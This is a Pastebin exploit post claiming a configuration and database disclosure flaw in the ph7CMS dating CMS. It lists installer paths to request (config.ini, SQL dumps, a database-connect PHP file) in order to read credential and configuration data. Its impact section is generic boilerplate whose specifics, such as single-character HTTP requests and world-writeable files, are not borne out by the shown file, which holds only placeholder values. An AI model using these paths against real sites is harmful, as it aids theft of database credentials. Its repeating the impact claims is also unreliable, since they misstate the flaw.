Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : ph7CMS Social Dating Community 14.8 Database Config Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : ph7cms.com
- # Software Download Link : ph7cms.com/social-dating-features/
- github.com/pH7Software/pH7-Social-Dating-CMS/archive/master.zip
- # Software Information Link : ph7cms.com/tag/php-dating-script/
- sourceforge.net/projects/ph7socialdating/
- ph7cms.com/ph7cms-14-8-released/
- # Software Version : 5.6.0 and 14.8 all previous versions.
- Compatible with PHP 5.6 and higher
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-16 [ Configuration ] ~ CWE-200 [ Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Config file of pH7 Dating Social Community CMS
- pH7 Dating CMS is a Social/Dating CMS written in Object-Oriented PHP (OOP),
- fully compatible and highly optimised for PHP 7+ and based on MVC architecture (Model-View-Controller).
- It is designed with the KISS principle in mind, and the whole source code can be read and
- understood in minutes. For a better flexibility, the software uses PDO (PHP Data Objects)
- abstraction which allows the choice of the database. The principle of development is DRY
- (Don't Repeat Yourself) aimed at reducing repetition of information of all kinds (no duplicate code)
- and YAGNI principle to avoid unused code/not needed functionality in the software.
- This Free and Open Source Social Dating Site Builder wants to be low resource-intensive,
- powerful, stable and secure. The software also comes with 38 system modules and is based
- on pH7Framework (written specifically for this project) that has over 52 packages.
- To summarize, pH7CMS gives you the perfect ingredients to create the best online
- dating service or social networking website on the World Wide Web!
- ####################################################################
- # Impact :
- ***********
- ph7CMS Social Dating Community 14.8 [ and other versions ] configuration file may potentially
- disclose sensitive information to remote attackers.
- The configuration file that ph7CMS Social Dating Community 14.8 stored in /_install/data/configs/config.ini
- HTTP requests consisting of a single character will cause the software to
- disclose sensitive configuration information, including the password/database to the administrative web interface.
- This file is installed, by default, with world readable and possibly world writeable permissions enabled.
- This may have some potentially serious consequences as the configuration
- file also stores password information in plain text.
- This issue occurs because access controls on configuration files are not properly set.
- An attacker can exploit this issue to retrieve potentially sensitive information.
- Attackers can access config file via URL request. This may aid in further attacks.
- ####################################################################
- # Database Configuration File Information Disclosure Exploit :
- *****************************************************
- /_install/data/configs/config.ini
- [database]
- type_name = %db_type_name%
- type = %db_type%
- hostname = "%db_hostname%"
- username = "%db_username%"
- password = "%db_password%"
- name = "%db_name%"
- prefix = "%db_prefix%"
- charset = "%db_charset%"
- port = %db_port%
- # Database Disclosure Exploit :
- ***************************
- /_install/data/sql/PostgreSQL/pH7_Core.sql
- /_install/data/sql/PostgreSQL/pH7_DataGame.sql
- /_install/data/sql/PostgreSQL/pH7_SampleData.sql
- /_install/data/sql/PostgreSQL/pH7_SchemaGame.sql
- /_install/data/sql/MySQL/pH7_Core.sql
- /_install/data/sql/MySQL/pH7_DataGame.sql
- /_install/data/sql/MySQL/pH7_SampleData.sql
- /_install/data/sql/MySQL/pH7_SchemaGame.sql
- # Database Disclosure Exploit 2 : => /_install/inc/_db_connect.inc.php
- *****************************
- <?php
- /**
- * @title Db Connect File
- namespace PH7;
- defined('PH7') or exit('Restricted access');
- $aParams = array(
- 'db_type' => $_SESSION['db']['type'],
- 'db_hostname' => $_SESSION['db']['hostname'],
- 'db_name' => $_SESSION['db']['name'],
- 'db_username' => $_SESSION['db']['username'],
- 'db_password' => $_SESSION['db']['password'],
- 'db_charset' => $_SESSION['db']['charset']
- );
- $DB = new Db($aParams);
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement